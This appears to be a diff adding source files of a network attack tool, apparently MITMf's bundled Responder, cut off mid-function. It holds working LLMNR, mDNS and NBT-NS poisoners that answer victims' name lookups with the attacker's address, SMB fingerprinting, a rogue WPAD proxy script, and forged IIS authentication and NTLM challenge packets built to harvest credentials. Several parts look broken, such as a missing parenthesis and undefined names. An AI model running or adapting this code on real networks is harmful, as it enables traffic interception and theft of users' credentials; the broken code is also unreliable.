+							if RespondToIPScope(RespondTo, self.client_address[0]):
+								if RespondToSpecificName(RespondToName) == False:
+									buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
+									buff.calculate()
+									for x in range(1):
+										soc.sendto(str(buff), self.client_address)
+										#mitmf_logger.info(Message)
+										mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name))
+										if args.finger:
+											try:
+												Finger = RunSmbFinger((self.client_address[0],445))
+												#print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0])
+												#print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1])
+												mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0]))
+												mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1]))
+											except Exception:
+												mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
+												pass
+
+								if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
+									buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
+									buff.calculate()
+									for x in range(1):
+										soc.sendto(str(buff), self.client_address)
+										mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0],Name))
+										if args.finger:
+											try:
+												Finger = RunSmbFinger((self.client_address[0],445))
+												#print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0])
+												#print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1])
+												mitmf_logger.info('[LLMNRPoisoner] OsVersion is:{}'.format(Finger[0]))
+												mitmf_logger.info('[LLMNRPoisoner] ClientVersion is :{}'.format(Finger[1]))
+											except Exception:
+												mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
+												pass
+
+					if args.analyze == False and RespondToSpecificHost(RespondTo) == False:
+						if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
+							buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
+							buff.calculate()
+							for x in range(1):
+								soc.sendto(str(buff), self.client_address)
+							mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name))
+							if args.finger:
+								try:
+									Finger = RunSmbFinger((self.client_address[0],445))
+									#print '[LLMNRPoisoner] OsVersion is:%s'%(Finger[0])
+									#print '[LLMNRPoisoner] ClientVersion is :%s'%(Finger[1])
+									mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0]))
+									mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1]))
+								except Exception:
+									mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
+									pass
+						if RespondToSpecificName(RespondToName) == False:
+							 buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name)
+							 buff.calculate() 
+							 for x in range(1):
+								 soc.sendto(str(buff), self.client_address)
+							 mitmf_logger.warning("[LLMNRPoisoner] Poisoned answer sent to {} the requested name was : {}".format(self.client_address[0], Name))
+							 if args.finger:
+								 try:
+									 Finger = RunSmbFinger((self.client_address[0],445))
+									 mitmf_logger.info('[LLMNRPoisoner] OsVersion is: {}'.format(Finger[0]))
+									 mitmf_logger.info('[LLMNRPoisoner] ClientVersion is : {}'.format(Finger[1]))
+								 except Exception:
+									 mitmf_logger.info('[LLMNRPoisoner] Fingerprint failed for host: {}'.format(self.client_address[0]))
+									 pass
+						else:
+							pass
+			else:
+				pass
+		except:
+			raise

core/responder/mdns/MDNSPoisoner.py

@@ -0,0 +1,103 @@
+#! /usr/bin/env python2.7
+
+from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+import threading
+import struct
+
+from core.protocols.odict import OrderedDict
+from core.protocols.packet import Packet
+
+class MDNSPoisoner():
+
+	def start():
+		try:
+			server = ThreadingUDPMDNSServer(("0.0.0.0", 5353), MDNS)
+			t = threading.Thread(name="MDNS", target=server.serve_forever)
+			t.setDaemon(True)
+			t.start()
+		except Exception, e:
+			print "Error starting MDNSPoisoner on port %s: %s:" % (str(port),str(e))
+
+class ThreadingUDPMDNSServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		MADDR = "224.0.0.251"
+		self.socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
+		self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 255)
+		Join = self.socket.setsockopt(socket.IPPROTO_IP,socket.IP_ADD_MEMBERSHIP,inet_aton(MADDR)+inet_aton(OURIP))
+
+		UDPServer.server_bind(self
+
+class MDNSAns(Packet):
+	fields = OrderedDict([
+		("Tid",              "\x00\x00"),
+		("Flags",            "\x84\x00"),
+		("Question",         "\x00\x00"),
+		("AnswerRRS",        "\x00\x01"),
+		("AuthorityRRS",     "\x00\x00"),
+		("AdditionalRRS",    "\x00\x00"),
+		("AnswerName",       ""),
+		("AnswerNameNull",   "\x00"),
+		("Type",             "\x00\x01"),
+		("Class",            "\x00\x01"),
+		("TTL",              "\x00\x00\x00\x78"),##Poison for 2mn.
+		("IPLen",            "\x00\x04"),
+		("IP",               "\x00\x00\x00\x00"),
+	])
+
+	def calculate(self):
+		self.fields["IP"] = inet_aton(OURIP)
+		self.fields["IPLen"] = struct.pack(">h",len(self.fields["IP"]))
+
+def Parse_MDNS_Name(data):
+	data = data[12:]
+	NameLen = struct.unpack('>B',data[0])[0]
+	Name = data[1:1+NameLen]
+	NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
+	Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+	return Name+'.'+Name_
+
+def Poisoned_MDNS_Name(data):
+	data = data[12:]
+	Name = data[:len(data)-5]
+	return Name
+
+class MDNS(BaseRequestHandler):
+
+	def handle(self):
+		MADDR = "224.0.0.251"
+		MPORT = 5353
+		data, soc = self.request
+		if self.client_address[0] == "127.0.0.1":
+			pass
+		try:
+			if AnalyzeMode:
+				if Parse_IPV6_Addr(data):
+					#print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))
+					responder_logger.info('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
+
+			if RespondToSpecificHost(RespondTo):
+				if AnalyzeMode == False:
+					if RespondToIPScope(RespondTo, self.client_address[0]):
+						if Parse_IPV6_Addr(data):
+							#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
+							responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
+							Name = Poisoned_MDNS_Name(data)
+							MDns = MDNSAns(AnswerName = Name)
+							MDns.calculate()
+							soc.sendto(str(MDns),(MADDR,MPORT))
+
+			if AnalyzeMode == False and RespondToSpecificHost(RespondTo) == False:
+				if Parse_IPV6_Addr(data):
+					#print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))
+					responder_logger.info('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)))
+					Name = Poisoned_MDNS_Name(data)
+					MDns = MDNSAns(AnswerName = Name)
+					MDns.calculate()
+					soc.sendto(str(MDns),(MADDR,MPORT))
+			else:
+				pass
+		except Exception:
+			raise

core/responder/nbtns/NBTNSPoisoner.py

@@ -0,0 +1,208 @@
+#! /usr/bin/env python2.7
+
+from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+import threading
+import struct
+
+from core.responder.packet import Packet
+
+class NBTNSPoisoner():
+
+	def start():
+		server = ThreadingUDPServer(("0.0.0.0", 137), NB)
+		t = threading.Thread(name="NBNS", target=server.serve_forever()) #NBNS
+		t.setDaemon(True)
+		t.start()
+
+class ThreadingUDPServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		UDPServer.server_bind(self)
+
+#NBT-NS answer packet.
+class NBT_Ans(Packet):
+	fields = OrderedDict([
+		("Tid",           ""),
+		("Flags",         "\x85\x00"),
+		("Question",      "\x00\x00"),
+		("AnswerRRS",     "\x00\x01"),
+		("AuthorityRRS",  "\x00\x00"),
+		("AdditionalRRS", "\x00\x00"),
+		("NbtName",       ""),
+		("Type",          "\x00\x20"),
+		("Classy",        "\x00\x01"),
+		("TTL",           "\x00\x00\x00\xa5"),
+		("Len",           "\x00\x06"),
+		("Flags1",        "\x00\x00"),
+		("IP",            "\x00\x00\x00\x00"),
+	])
+
+	def calculate(self,data):
+		self.fields["Tid"] = data[0:2]
+		self.fields["NbtName"] = data[12:46]
+		self.fields["IP"] = inet_aton(OURIP)
+
+def NBT_NS_Role(data):
+	Role = {
+		"\x41\x41\x00":"Workstation/Redirector Service.",
+		"\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)",
+		"\x42\x4d\x00":"Domain controller service. This name is a domain controller.",
+		"\x42\x4e\x00":"Local Master Browser.",
+		"\x42\x4f\x00":"Browser Election Service.",
+		"\x43\x41\x00":"File Server Service.",
+		"\x41\x42\x00":"Browser Service.",
+	}
+
+	if data in Role:
+		return Role[data]
+	else:
+		return "Service not known."
+
+# Define what are we answering to.
+def Validate_NBT_NS(data,Wredirect):
+	if AnalyzeMode:
+		return False
+
+	if NBT_NS_Role(data[43:46]) == "File Server Service.":
+		return True
+
+	if NBTNSDomain == True:
+		if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.":
+			return True
+
+	if Wredirect == True:
+		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector Service.":
+			return True
+
+	else:
+		return False
+
+def Decode_Name(nbname):
+	#From http://code.google.com/p/dpkt/ with author's permission.
+	try:
+		if len(nbname) != 32:
+			return nbname
+		l = []
+		for i in range(0, 32, 2):
+			l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
+					   ((ord(nbname[i+1]) - 0x41) & 0xf)))
+		return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
+	except:
+		return "Illegal NetBIOS name"
+
+# NBT_NS Server class.
+class NB(BaseRequestHandler):
+
+	def handle(self):
+		data, socket = self.request
+		Name = Decode_Name(data[13:45])
+
+		if DontRespondToSpecificHost(DontRespondTo):
+			if RespondToIPScope(DontRespondTo, self.client_address[0]):
+				return None
+
+		if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
+			return None 
+
+		if AnalyzeMode:
+			if data[2:4] == "\x01\x10":
+				if Is_Finger_On(Finger_On_Off):
+					try:
+						Finger = RunSmbFinger((self.client_address[0],445))
+						Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])
+						logger3.warning(Message)
+					except Exception:
+						Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
+						logger3.warning(Message)
+				else:
+					Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
+					logger3.warning(Message)
+
+		if RespondToSpecificHost(RespondTo) and AnalyzeMode == False:
+			if RespondToIPScope(RespondTo, self.client_address[0]):
+				if data[2:4] == "\x01\x10":
+					if Validate_NBT_NS(data,Wredirect):
+						if RespondToSpecificName(RespondToName) == False:
+							buff = NBT_Ans()
+							buff.calculate(data)
+							for x in range(1):
+								socket.sendto(str(buff), self.client_address)
+								Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+								#responder_logger.info(Message)
+								logger2.warning(Message)
+								if Is_Finger_On(Finger_On_Off):
+									try:
+										Finger = RunSmbFinger((self.client_address[0],445))
+										#print '[+] OsVersion is:%s'%(Finger[0])
+										#print '[+] ClientVersion is :%s'%(Finger[1])
+										responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+										responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+									except Exception:
+										responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+										pass
+						if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
+							buff = NBT_Ans()
+							buff.calculate(data)
+							for x in range(1):
+								socket.sendto(str(buff), self.client_address)
+								Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+								#responder_logger.info(Message)
+								logger2.warning(Message)
+								if Is_Finger_On(Finger_On_Off):
+									try:
+										Finger = RunSmbFinger((self.client_address[0],445))
+										#print '[+] OsVersion is:%s'%(Finger[0])
+										#print '[+] ClientVersion is :%s'%(Finger[1])
+										responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+										responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+									except Exception:
+										responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+										pass
+						else:
+							pass
+			else:
+				pass
+
+		else:
+			if data[2:4] == "\x01\x10":
+				if Validate_NBT_NS(data,Wredirect) and AnalyzeMode == False:
+					if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
+						buff = NBT_Ans()
+						buff.calculate(data)
+						for x in range(1):
+							socket.sendto(str(buff), self.client_address)
+						Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+						#responder_logger.info(Message)
+						logger2.warning(Message)
+						if Is_Finger_On(Finger_On_Off):
+							try:
+								Finger = RunSmbFinger((self.client_address[0],445))
+								#print '[+] OsVersion is:%s'%(Finger[0])
+								#print '[+] ClientVersion is :%s'%(Finger[1])
+								responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+								responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+							except Exception:
+								responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+								pass
+					if RespondToSpecificName(RespondToName) == False:
+						buff = NBT_Ans()
+						buff.calculate(data)
+						for x in range(1):
+							socket.sendto(str(buff), self.client_address)
+						Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+						#responder_logger.info(Message)
+						logger2.warning(Message)
+						if Is_Finger_On(Finger_On_Off):
+							try:
+								Finger = RunSmbFinger((self.client_address[0],445))
+								#print '[+] OsVersion is:%s'%(Finger[0])
+								#print '[+] ClientVersion is :%s'%(Finger[1])
+								responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+								responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+							except Exception:
+								responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+								pass
+					else:
+						pass

core/responder/odict.py

@@ -0,0 +1,120 @@
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+
+#Packet class handling all packet generation (see odict.py).
+from UserDict import DictMixin
+
+class OrderedDict(dict, DictMixin):
+
+    def __init__(self, *args, **kwds):
+        if len(args) > 1:
+            raise TypeError('expected at most 1 arguments, got %d' % len(args))
+        try:
+            self.__end
+        except AttributeError:
+            self.clear()
+        self.update(*args, **kwds)
+
+    def clear(self):
+        self.__end = end = []
+        end += [None, end, end]
+        self.__map = {}
+        dict.clear(self)
+
+    def __setitem__(self, key, value):
+        if key not in self:
+            end = self.__end
+            curr = end[1]
+            curr[2] = end[1] = self.__map[key] = [key, curr, end]
+        dict.__setitem__(self, key, value)
+
+    def __delitem__(self, key):
+        dict.__delitem__(self, key)
+        key, prev, next = self.__map.pop(key)
+        prev[2] = next
+        next[1] = prev
+
+    def __iter__(self):
+        end = self.__end
+        curr = end[2]
+        while curr is not end:
+            yield curr[0]
+            curr = curr[2]
+
+    def __reversed__(self):
+        end = self.__end
+        curr = end[1]
+        while curr is not end:
+            yield curr[0]
+            curr = curr[1]
+
+    def popitem(self, last=True):
+        if not self:
+            raise KeyError('dictionary is empty')
+        if last:
+            key = reversed(self).next()
+        else:
+            key = iter(self).next()
+        value = self.pop(key)
+        return key, value
+
+    def __reduce__(self):
+        items = [[k, self[k]] for k in self]
+        tmp = self.__map, self.__end
+        del self.__map, self.__end
+        inst_dict = vars(self).copy()
+        self.__map, self.__end = tmp
+        if inst_dict:
+            return (self.__class__, (items,), inst_dict)
+        return self.__class__, (items,)
+
+    def keys(self):
+        return list(self)
+
+    setdefault = DictMixin.setdefault
+    update = DictMixin.update
+    pop = DictMixin.pop
+    values = DictMixin.values
+    items = DictMixin.items
+    iterkeys = DictMixin.iterkeys
+    itervalues = DictMixin.itervalues
+    iteritems = DictMixin.iteritems
+
+    def __repr__(self):
+        if not self:
+            return '%s()' % (self.__class__.__name__,)
+        return '%s(%r)' % (self.__class__.__name__, self.items())
+
+    def copy(self):
+        return self.__class__(self)
+
+    @classmethod
+    def fromkeys(cls, iterable, value=None):
+        d = cls()
+        for key in iterable:
+            d[key] = value
+        return d
+
+    def __eq__(self, other):
+        if isinstance(other, OrderedDict):
+            return len(self)==len(other) and \
+                   min(p==q for p, q in  zip(self.items(), other.items()))
+        return dict.__eq__(self, other)
+
+    def __ne__(self, other):
+        return not self == other

core/responder/packet.py

@@ -0,0 +1,34 @@
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+
+#Packet class handling all packet generation (see odict.py).
+from odict import OrderedDict
+
+class Packet():
+    fields = OrderedDict([
+        ("data", ""),
+    ])
+    def __init__(self, **kw):
+        self.fields = OrderedDict(self.__class__.fields)
+        for k,v in kw.items():
+            if callable(v):
+                self.fields[k] = v(self.fields[k])
+            else:
+                self.fields[k] = v
+    def __str__(self):
+        return "".join(map(str, self.fields.values()))

core/responder/wpad/HTTPPackets.py

@@ -0,0 +1,275 @@
+#! /usr/bin/env python
+# NBT-NS/LLMNR Responder
+# Created by Laurent Gaffie
+# Copyright (C) 2014 Trustwave Holdings, Inc.
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+# 
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see <http://www.gnu.org/licenses/>.
+
+import struct
+
+from core.responder.packet import Packet
+from core.responder.odict import OrderedDict
+from base64 import b64decode,b64encode
+
+#WPAD script. the wpadwpadwpad is shorter than 15 chars and unlikely to be found.
+class WPADScript(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 200 OK\r\n"),
+        ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: application/x-ns-proxy-autoconfig\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("ContentLen",    "Content-Length: "),
+        ("ActualLen",     "76"), 
+        ("CRLF",          "\r\n\r\n"),
+        ("Payload",       "function FindProxyForURL(url, host){return 'PROXY wpadwpadwpad:3141; DIRECT';}"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+
+class ServerExeFile(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 200 OK\r\n"),
+        ("ContentType",   "Content-Type: application/octet-stream\r\n"),
+        ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+        ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
+        ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("ContentLen",    "Content-Length: "),
+        ("ActualLen",     "76"), 
+        ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+        ("Connection",    "Connection: keep-alive\r\n"),
+        ("X-CCC",         "US\r\n"),
+        ("X-CID",         "2\r\n"),
+        ("CRLF",          "\r\n"),
+        ("Payload",       "jj"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+
+class ServeAlwaysExeFile(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 200 OK\r\n"),
+        ("ContentType",   "Content-Type: application/octet-stream\r\n"),
+        ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+        ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
+        ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("ContentDisp",   "Content-Disposition: attachment; filename="),
+        ("ContentDiFile", ""),
+        ("FileCRLF",      ";\r\n"),
+        ("ContentLen",    "Content-Length: "),
+        ("ActualLen",     "76"), 
+        ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+        ("Connection",    "Connection: keep-alive\r\n"),
+        ("X-CCC",         "US\r\n"),
+        ("X-CID",         "2\r\n"),
+        ("CRLF",          "\r\n"),
+        ("Payload",       "jj"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+
+class ServeAlwaysNormalFile(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 200 OK\r\n"),
+        ("ContentType",   "Content-Type: text/html\r\n"),
+        ("LastModified",  "Last-Modified: Wed, 24 Nov 2010 00:39:06 GMT\r\n"),
+        ("AcceptRanges",  "Accept-Ranges: bytes\r\n"),
+        ("Server",        "Server: Microsoft-IIS/7.5\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("ContentLen",    "Content-Length: "),
+        ("ActualLen",     "76"), 
+        ("Date",          "\r\nDate: Thu, 24 Oct 2013 22:35:46 GMT\r\n"),
+        ("Connection",    "Connection: keep-alive\r\n"),
+        ("X-CCC",         "US\r\n"),
+        ("X-CID",         "2\r\n"),
+        ("CRLF",          "\r\n"),
+        ("Payload",       "jj"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+
+#HTTP Packet used for further NTLM auth.
+class IIS_Auth_407_Ans(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 407 Authentication Required\r\n"),
+        ("Via",           "Via: 1.1 SMB-TOOLKIT\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: text/html\r\n"),
+        ("WWW-Auth",      "Proxy-Authenticate: NTLM\r\n"),
+        ("Connection",    "Connection: close \r\n"),
+        ("PConnection",   "proxy-Connection: close \r\n"),
+        ("Len",           "Content-Length: 0\r\n"), 
+        ("CRLF",          "\r\n"),                               
+    ])
+
+#HTTP NTLM packet.
+class IIS_407_NTLM_Challenge_Ans(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 407 Authentication Required\r\n"),
+        ("Via",           "Via: 1.1 SMB-TOOLKIT\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: text/html\r\n"),
+        ("WWWAuth",       "Proxy-Authenticate: NTLM "),
+        ("Payload",       ""),
+        ("Payload-CRLF",  "\r\n"),
+        ("PoweredBy",     "X-Powered-By: SMB-TOOLKIT\r\n"),
+        ("Len",           "Content-Length: 0\r\n"),
+        ("CRLF",          "\r\n"),                                            
+    ])
+
+    def calculate(self,payload):
+        self.fields["Payload"] = b64encode(payload)
+
+#HTTP Basic answer packet.
+class IIS_Basic_407_Ans(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 407 Unauthorized\r\n"),
+        ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: text/html\r\n"),
+        ("WWW-Auth",      "Proxy-Authenticate: Basic realm=\"ISAServer\"\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("Len",           "Content-Length: 0\r\n"), 
+        ("CRLF",          "\r\n"),                               
+    ])
+
+#HTTP Packet used for further NTLM auth.
+class IIS_Auth_401_Ans(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 401 Unauthorized\r\n"),
+        ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: text/html\r\n"),
+        ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("Len",           "Content-Length: 0\r\n"), 
+        ("CRLF",          "\r\n"),                               
+    ])
+
+#HTTP Packet Granted auth.
+class IIS_Auth_Granted(Packet):
+    fields = OrderedDict([
+        ("Code",          "HTTP/1.1 200 OK\r\n"),
+        ("ServerType",    "Server: Microsoft-IIS/6.0\r\n"),
+        ("Date",          "Date: Wed, 12 Sep 2012 13:06:55 GMT\r\n"),
+        ("Type",          "Content-Type: text/html\r\n"),
+        ("WWW-Auth",      "WWW-Authenticate: NTLM\r\n"),
+        ("PoweredBy",     "X-Powered-By: ASP.NET\r\n"),
+        ("ContentLen",    "Content-Length: "),
+        ("ActualLen",     "76"), 
+        ("CRLF",          "\r\n\r\n"),
+        ("Payload",       "<html>\n<head>\n</head>\n<body>\n<img src='file:\\\\\\\\\\\\shar\\smileyd.ico' alt='Loading' height='1' width='2'>\n</body>\n</html>\n"),
+    ])
+    def calculate(self):
+        self.fields["ActualLen"] = len(str(self.fields["Payload"]))
+
+#HTTP NTLM Auth
+class NTLM_Challenge(Packet):
+    fields = OrderedDict([
+        ("Signature",        "NTLMSSP"),
+        ("SignatureNull",    "\x00"),
+        ("MessageType",      "\x02\x00\x00\x00"),
+        ("TargetNameLen",    "\x06\x00"),
+        ("TargetNameMaxLen", "\x06\x00"),
+        ("TargetNameOffset", "\x38\x00\x00\x00"),
+        ("NegoFlags",        "\x05\x02\x89\xa2"),
+        ("ServerChallenge",  ""),
+        ("Reserved",         "\x00\x00\x00\x00\x00\x00\x00\x00"),
+        ("TargetInfoLen",    "\x7e\x00"),
+        ("TargetInfoMaxLen", "\x7e\x00"),
+        ("TargetInfoOffset", "\x3e\x00\x00\x00"),
+        ("NTLMOsVersion",    "\x05\x02\xce\x0e\x00\x00\x00\x0f"),
+        ("TargetNameStr",    "SMB"),
+        ("Av1",              "\x02\x00"),#nbt name
+        ("Av1Len",           "\x06\x00"),
+        ("Av1Str",           "SMB"),
+        ("Av2",              "\x01\x00"),#Server name
+        ("Av2Len",           "\x14\x00"),
+        ("Av2Str",           "SMB-TOOLKIT"),
+        ("Av3",              "\x04\x00"),#Full Domain name
+        ("Av3Len",           "\x12\x00"),
+        ("Av3Str",           "smb.local"),
+        ("Av4",              "\x03\x00"),#Full machine domain name
+        ("Av4Len",           "\x28\x00"),
+        ("Av4Str",           "server2003.smb.local"),
+        ("Av5",              "\x05\x00"),#Domain Forest Name
+        ("Av5Len",           "\x12\x00"),
+        ("Av5Str",           "smb.local"),
+        ("Av6",              "\x00\x00"),#AvPairs Terminator
+        ("Av6Len",           "\x00\x00"),             
+    ])
+
+    def calculate(self):
+        ##First convert to uni
+        self.fields["TargetNameStr"] = self.fields["TargetNameStr"].encode('utf-16le')
+        self.fields["Av1Str"] = self.fields["Av1Str"].encode('utf-16le')
+        self.fields["Av2Str"] = self.fields["Av2Str"].encode('utf-16le')
+        self.fields["Av3Str"] = self.fields["Av3Str"].encode('utf-16le')
+        self.fields["Av4Str"] = self.fields["Av4Str"].encode('utf-16le')
+        self.fields["Av5Str"] = self.fields["Av5Str"].encode('utf-16le')
+      
+        ##Then calculate
+        CalculateNameOffset = str(self.fields["Signature"])+str(self.fields["SignatureNull"])+str(self.fields["MessageType"])+str(self.fields["TargetNameLen"])+str(self.fields["TargetNameMaxLen"])+str(self.fields["TargetNameOffset"])+str(self.fields["NegoFlags"])+str(self.fields["ServerChallenge"])+str(self.fields["Reserved"])+str(self.fields["TargetInfoLen"])+str(self.fields["TargetInfoMaxLen"])+str(self.fields["TargetInfoOffset"])+str(self.fields["NTLMOsVersion"])
+
+        CalculateAvPairsOffset = CalculateNameOffset+str(self.fields["TargetNameStr"])
+
